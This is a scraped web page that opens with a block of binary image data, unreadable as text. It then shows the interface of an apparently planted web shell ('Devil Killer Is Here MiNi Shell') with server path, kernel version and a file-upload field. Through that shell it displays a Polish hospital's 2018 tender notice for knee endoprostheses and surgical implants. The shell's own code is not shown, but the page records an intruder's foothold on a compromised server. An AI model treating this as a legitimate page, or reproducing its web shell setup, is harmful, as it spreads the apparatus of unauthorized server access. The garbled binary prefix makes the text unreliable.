JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20180301/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20180301/525523-N-2018.html

 <script type="text/javascript">//<![CDATA[//]]></script> <div> <style type="text/css"> .divRow_xforms { float: left; width: 100%; font-weight: normal; line-height: 30px; } .headerLarge_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: larger} .headerMedium_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: medium} .headerSmall_xforms { font-weight: bold; font-size: x-small;} .table_xforms { border-collapse: collapse; width: 900px; font-weight: normal} .table_xforms td { border: 2px solid black; border-collapse: collapse; padding: 5px;} .table_xforms th { border: 2px solid black; border-collapse: collapse; padding: 5px; font-weight: bold} @media print { .no-print, .no-print * { display: none !important; } } </style> <br /> <br /> <span id="ctl00_ContentPlaceHolder1_lblNumerOgloszenia">Ogłoszenie nr 525523-N-2018 z dnia 2018-03-01 r. </span> <br /> <br /> <div class="divRow_xforms"> <div class="headerMedium_xforms" style="text-align: center"> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc_h">Powiatowy Szpital im. Władysława Biegańskiego w Iławie</span>: <span id="ctl00_ContentPlaceHolder1_nazwa_nadana_zamowieniu_h">Dostawa endoprotez kolanowych, implantów chirurgicznych, taśm oraz siatek z podziałem na 9 pakietów dla Powiatowego Szpitala im. Władysława Biegańskiego w Iławie nr sprawy dla Powiatowego Szpitala im. Władysława Biegańskiego w Iławie </span><br/> OGŁOSZENIE O ZAMÓWIENIU - <span id="ctl00_ContentPlaceHolder1_rodzaj_zamowienia_h">Dostawy</span> </div> <div> <b>Zamieszczanie ogłoszenia:</b> <span id="ctl00_ContentPlaceHolder1_zamieszczanie_obowiazkowe">Zamieszczanie obowiązkowe</span> </div> <div> <b>Ogłoszenie dotyczy:</b> <span id="ctl00_ContentPlaceHolder1_ogloszenie_dotyczy">Zamówienia publicznego</span> </div> <div> <b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_finansowane_z_unii">Nie</span> </div> <br/> <b>Nazwa projektu lub programu</b> <br/> <span id="ctl00_ContentPlaceHolder1_nazwa_projektu_programu"></span> </div> <div> <b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_ubiegac_zaklady_pracy">Nie</span> </div> <br/> Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %) <br/> <span id="ctl00_ContentPlaceHolder1_minimalny_procent_zatrudnienia"></span> </div> <div class="headerLarge_xforms" style="text-align: left"> <u>SEKCJA I: ZAMAWIAJĄCY</u> </div> <div style="padding-left: 20px"> <b>Postępowanie przeprowadza centralny zamawiający </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_centralny_zamawiajacy">Nie</span> </div> <b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_podmiot_zamawiajacy_powierzyl">Nie</span> </div> <b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_powierzyl"></span> <br/> <b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_wspolnie">Nie</span> </div> <br/> Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów: <br/> <br/> <b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_zamawiajacy_z_eu">Nie</span> </div> <b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej - mające zastosowanie krajowe prawo zamówień publicznych:</b> <span id="ctl00_ContentPlaceHolder1_postepowanie_wspolne_tresc"></span> <br/> <b>Informacje dodatkowe:</b> <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_zamawiajacy"></span> <br/> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>I. 1) NAZWA I ADRES: </b> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_nazwa">Powiatowy Szpital im. Władysława Biegańskiego w Iławie</span>, krajowy numer identyfikacyjny <span id="ctl00_ContentPlaceHolder1_regon">51087919600000</span>, ul. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_ulica">ul. Gen. Wł. Andersa</span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_domu">3</span> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_mieszkania"></span> , <span id="ctl00_ContentPlaceHolder1_zamawiajacy_kod_pocztowy">14200 </span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc">Iława</span>, woj. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_wojewodztwo">warmińsko-mazurskie</span>, państwo <span id="ctl00_ContentPlaceHolder1_zamawiajacy_panstwo">Polska</span>, tel. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_telefon">896 449 601</span>, e-mail <span id="ctl00_ContentPlaceHolder1_zamawiajacy_email">dzp@szpital.ilawa.pl</span>, faks <span id="ctl00_ContentPlaceHolder1_zamawiajacy_fax">896 492 425</span>. <br/> Adres strony internetowej (URL): <span id="ctl00_ContentPlaceHolder1_adres_strony_url">www.szpital.ilawa.pl</span> <br/> Adres profilu nabywcy: <span id="ctl00_ContentPlaceHolder1_adres_strony_internetowej">www.szpital.ilawa.pl</span> <br/> Adres strony internetowej pod którym można uzyskać dostęp do narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne <span id="ctl00_ContentPlaceHolder1_adres_strony_internetowej_narzedzia"></span> </div> <div style="text-align: left"> <b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego">Jednostki organizacyjne administracji samorządowej</span> <br /> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego_inny"></span> </div> <div style="text-align: left"> <b> I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>: </b> <div style="padding-left: 20px"> Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających): <br/> <span id="ctl00_ContentPlaceHolder1_wspolne_udzielanie_zamowienia"></span> </div> </div> <div style="text-align: left"> <b> I.4) KOMUNIKACJA: </b> <br/> <b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_dostep_dokumentow_zamowienia">Tak</span> <br/> <span id="ctl00_ContentPlaceHolder1_dostep_dokumentow_zamowienia">www.szpital.ilawa.pl</span> </div> <br/> <b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_zamieszczona_bedzie_specyfikacja">Tak</span> <br/> <span id="ctl00_ContentPlaceHolder1_zamieszczona_bedzie_specyfikacja">www.szpital.ilawa.pl</span> </div> <br/> <b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_dostep_do_dokumentow_ograniczony">Nie</span> <br/> <span id="ctl00_ContentPlaceHolder1_dostep_do_dokumentow_ograniczony"></span> </div> <br/> <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b> <br/> <b>Elektronicznie</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_oferty_wnioski_dostepne">Nie</span> <br/> adres <br/> <span id="ctl00_ContentPlaceHolder1_oferty_wnioski_dostepne"></span> </div> <br/> <div style="padding-left: 20px"> <b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszczone_wymagane_przeslanie_ofert">Nie</span> <br/> Inny sposób: <br/> <span id="ctl00_ContentPlaceHolder1_dopuszczone_wymagane_przeslanie_ofert_inny"></span> <br/> <b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_wymagane_przeslanie_ofert">Tak</span> <br /> Inny sposób: <br/> <span id="ctl00_ContentPlaceHolder1_wymagane_przeslanie_ofert_inny">pisemny</span> <br/> Adres: <br/> <span id="ctl00_ContentPlaceHolder1_dopuszczone_wymagane_przeslanie_ofert_adres">Powiatowy Szpital im. Władysława Biegańskiego w Iławie ul. Andersa 3 14-200 Iława Kancelaria </span> </div> <br/> <b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_komunikacja_elektroniczna_wymaga">Nie</span> <br/> Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL) <br/> <span id="ctl00_ContentPlaceHolder1_komunikacja_elektroniczna_wymaga"></span> </div> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA II: PRZEDMIOT ZAMÓWIENIA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <br/> <b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b> <span id="ctl00_ContentPlaceHolder1_nazwa_nadana_zamowieniu">Dostawa endoprotez kolanowych, implantów chirurgicznych, taśm oraz siatek z podziałem na 9 pakietów dla Powiatowego Szpitala im. Władysława Biegańskiego w Iławie nr sprawy dla Powiatowego Szpitala im. Władysława Biegańskiego w Iławie </span> <br/> <b>Numer referencyjny: </b> <span id="ctl00_ContentPlaceHolder1_numer_referencyjny">6/2018</span> <br/> <b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b> <br/> <div style="padding-left: 20px; text-align: justify"> <span id="ctl00_ContentPlaceHolder1_czy_dialog_techniczny">Nie</span> </div> <br/> <b>II.2) Rodzaj zamówienia: </b> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamowienia">Dostawy</span> <br/> <b>II.3) Informacja o możliwości składania ofert częściowych</b> <br/> Zamówienie podzielone jest na części: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_podzielone_na_czesci">Tak</span> <br/> <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b> <br/> <span id="ctl00_ContentPlaceHolder1_oferty_lub_wnioski">wszystkich części</span> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci"></span> <br/> </div> <b>Zamawiający zastrzega sobie prawo do udzielenia łącznie następujących części lub grup części:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zastrzega_prawo_grup_czesci"></span> <br/> <b>Maksymalna liczba części zamówienia, na które może zostać udzielone zamówienie jednemu wykonawcy:</b> <br/> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci_jednemu_wykonawcy"></span> <br/> <br/> <br/> <b> II.4) Krótki opis przedmiotu zamówienia </b> <i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane: </b> <span id="ctl00_ContentPlaceHolder1_okreslenie_przedmiotu">Przedmiotem zamówienia jest dostawa endoprotez kolanowych, implantów chirurgicznych, taśm oraz siatek z podziałem na 9 pakietów dla Powiatowego Szpitala im. Władysława Biegańskiego w Iławie nr sprawy dla Powiatowego Szpitala im. Władysława Biegańskiego w Iławie (nr sprawy 6/2018) Część nr 1 IMPLANTY CHIRURGICZNE Część nr 2 OSTRZA I FREZY DO ARTROSKOPII KOLANA I BARKUCzęść nr 3 ENDOPROTEZA JEDNOPRZEDZIAŁOWA STAWU KOLANOWEGO Część nr 4 ENDOPROTEZA STAWU KOLANOWEGO Część nr 5 ZESTAW DO SZYCIA ŁĄKOTEKCzęść nr 6 MEMBRANYCzęść nr 7 TAŚMA DO OPERACYJNEGO LECZENIA WYSIŁKOWEGO NIETRZYMANIA MOCZUCzęść nr 8 SIATKA DO PLASTYK CYSTOCELE I RECTOCELECzęść nr 9 PROWADNICA NITINOLOWA</span> <br/> <br/> <b>II.5) Główny kod CPV: </b> <span id="ctl00_ContentPlaceHolder1_cpv_glowny_przedmiot">33169000-2</span> <br/> <b> Dodatkowe kody CPV:</b> <br/> <TABLE style='border: 1px solid black;border-collapse: collapse;'><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Kod CPV</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>33169000-2</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>33162000-3</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>33184100-4</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>33141770-8</TD></TR></TABLE> <br /> <br /> <b> II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>: <br/> Wartość bez VAT: <span id="ctl00_ContentPlaceHolder1_szacunkowa_wartosc_zamowienia_calosc"></span> <br/> Waluta: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_waluta_calosc"></span> <br/> <i>(w przypadku umów ramowych lub dynamicznego systemu zakupów - szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i> </div> <br/> <b> II.7) Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7 lub w art. 134 ust. 6 pkt 3 ustawy Pzp: </b> <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zamowien_67">Nie</span> <br/> Określenie przedmiotu, wielkości lub zakresu oraz warunków na jakich zostaną udzielone zamówienia, o których mowa w art. 67 ust. 1 pkt 6 lub w art. 134 ust. 6 pkt 3 ustawy Pzp: <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zamowien_67_tekst"></span> <br/> <b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b> <br /> miesiącach:&#160; <span id="ctl00_ContentPlaceHolder1_okres_w_miesiacach">12</span> &#160;<i> lub </i> <b> dniach:</b> <span id="ctl00_ContentPlaceHolder1_okres_w_dniach"></span> <br /> <i>lub</i> <br /> <b> data rozpoczęcia: </b> <span id="ctl00_ContentPlaceHolder1_data_rozpoczecia"></span> &#160;<i> lub </i><b> zakończenia: </b> <span id="ctl00_ContentPlaceHolder1_data_zakonczenia"></span> <br /> <br/> <b>II.9) Informacje dodatkowe: </b> <span id="ctl00_ContentPlaceHolder1_informacje_na_temat_katalogow"></span> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b> III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU </b> <br/> <div style="padding-left: 20px"> <b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_okreslenie_warunkow">Zamawiający nie stawia wymagań w zakresie spełnienia tego warunku </span> <br/> Informacje dodatkowe <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_okreslenie_warunkow"></span> <br/> <b>III.1.2) Sytuacja finansowa lub ekonomiczna </b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_sytuacja_finansowa_okreslenie_warunkow">Zamawiający nie stawia wymagań w zakresie spełnienia tego warunku </span> <br/> Informacje dodatkowe <span id="ctl00_ContentPlaceHolder1_sytuacja_finansowa_informacje_dodatkowe"></span> <br/> <b>III.1.3) Zdolność techniczna lub zawodowa </b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_zdolnosc_techniczna_okreslenie_warunkow">Zamawiający nie stawia wymagań w zakresie spełnienia tego warunku </span> <br/> Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób: <span id="ctl00_ContentPlaceHolder1_czy_zdolnosc_techniczna_wymaga_wykonawcow"></span> <br/> Informacje dodatkowe: <span id="ctl00_ContentPlaceHolder1_zdolnosc_techniczna_informacje_dodatkowe"></span> </div> <b> III.2) PODSTAWY WYKLUCZENIA </b> <br/> <div style="padding-left: 20px"> <b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1 ustawy Pzp</b> <br/> <b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b> <span id="ctl00_ContentPlaceHolder1_czy_zamawiajacy_przewiduje_wykluczenie">Nie</span> Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia: <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_1"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_2"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_3"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_4"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_5"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_6"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_7"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_8"></span> <br/> </div> <b> III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI </b> <br/> <div style="padding-left: 20px"> <b> Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu </b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_oswiadczenie_niepodleganiu_wykluczenia">Tak</span> <br/> <b> Oświadczenie o spełnianiu kryteriów selekcji </b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_oswiadczenie_spelnienie_kryteriow">Nie</span> </div> <b> III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP: </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_wykaz_dokumentow_zaswiadczen"></span> </div> <b> III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP </b> <br/> <div style="padding-left: 20px"> <b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zakresie_warunkow_udzialu"></span> <br/> <b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zakresie_kryteriow_selekcji"></span> </div> <b> III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_wykaz_potwierdzenie_okolicznosci">Część nr 1 Dokument potwierdzający możliwość wykonania badania TK i rezonansu magnetycznego z dostarczanymi implantami.</span> </div> <b> III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6) </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_inne_dokumenty_niewymienione">B. Na etapie składania ofert , oferta powinna zawierać:1. Sporządzony przez wykonawcę, według wzoru stanowiącego załącznik nr 1 do SIWZ, Formularz ofertowy,2. Sporządzony przez wykonawcę, według wzoru stanowiącego załącznik nr 2 do SIWZ, Formularz cenowy,3. Oświadczenie o którym mowa w rozdziale VII A pkt. 1.1. SIWZ. , które stanowi załącznik nr 4do SIWZ4.	Dokument KRS lub CEiDG w celu weryfikacji osób uprawnionych do reprezentowania wykonawcy tym samym składania oświadczenia woli. (z zastrzeżeniem art. 26 ust 6.)</span> </div> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA IV: PROCEDURA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>IV.1) OPIS </b> <br/> <b>IV.1.1) Tryb udzielenia zamówienia: </b> <span id="ctl00_ContentPlaceHolder1_tryb_udzielenia_zamowienia">Przetarg nieograniczony</span> <br/> <b>IV.1.2) Zamawiający żąda wniesienia wadium:</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wadium">Nie</span> <br/> Informacja na temat wadium <br/> <span id="ctl00_ContentPlaceHolder1_wadium"></span> </div> <br/> <b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zaliczek">Nie</span> <br/> Należy podać informacje na temat udzielania zaliczek: <br/> <span id="ctl00_ContentPlaceHolder1_przewiduje_udzielenie_zaliczek"></span> </div> <br/> <b> IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych: </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wymaga_zlozenie_katalogow_elektronicznych">Nie</span> <br/> Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych: <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_katalogow_elektronicznych">Nie</span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_zlozenie_katalogow_elektronicznych_informacje_dodatkowe"></span> </div> <br/> <b> IV.1.5.) Wymaga się złożenia oferty wariantowej: </b> <div 